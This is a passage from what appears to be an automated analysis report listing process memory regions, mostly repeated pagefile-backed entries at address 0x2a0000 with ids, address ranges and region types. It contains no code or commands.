entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3933 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3934 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3935 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3936 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3937 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3938 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3939 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3940 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3941 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3942 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3943 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3944 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3945 start_va = 0x2a0000 
end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3946 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3947 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3948 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3949 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3950 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3951 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3952 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3953 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3954 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3955 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3956 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3957 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3958 
start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3959 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3960 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3961 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3962 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3963 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3964 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3965 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3966 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3967 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3968 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3969 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3970 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id 
= 3971 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 3972 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 3973 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 3974 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3975 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3976 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3977 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3978 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3979 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3980 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3981 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3982 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3983 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 3984 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3985 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3986 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3987 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3988 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3989 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3990 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3991 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3992 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3993 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3994 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3995 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3996 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 3997 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3998 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3999 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4000 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4001 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4002 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4003 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4004 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4005 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4006 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4007 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4008 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4009 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4010 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4011 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4012 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4013 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4014 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4015 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4016 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4017 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4018 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4019 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4020 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4021 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4022 start_va = 0x2a0000 end_va = 0x2affff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4023 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4129 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4131 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 4132 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 4133 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 4134 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4135 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4136 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4137 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4138 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4139 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4140 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4141 start_va = 0x2a0000 end_va = 0x2affff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4142 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4143 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4144 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4145 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4146 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4147 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4148 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4149 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4150 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4151 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4152 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4153 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4154 start_va = 0x2a0000 
end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4155 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4156 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4157 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4158 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4159 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4160 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4161 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4162 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4163 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4164 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4175 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4176 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4177 
start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4178 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4179 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4180 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4181 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4182 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4183 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4184 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4185 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4186 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4187 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4188 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4189 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 4190 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4191 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4192 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4193 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 4194 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 4195 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 4196 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4197 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4198 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4199 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4200 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4201 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4202 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 4203 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4204 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4205 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4206 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4207 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4208 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4209 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4210 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4211 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4212 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4213 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4214 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4215 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 4216 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4217 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4218 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4219 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4220 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4221 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4222 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4223 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4224 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4225 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4226 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4227 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4228 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4229 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4230 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4231 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4232 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4233 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4234 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4235 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4236 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4237 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4238 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4239 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4277 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4278 start_va = 0x2a0000 end_va = 0x2affff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4279 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4280 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4281 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4282 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4443 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4444 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 4445 start_va = 0x1c10000 end_va = 0x201ffff 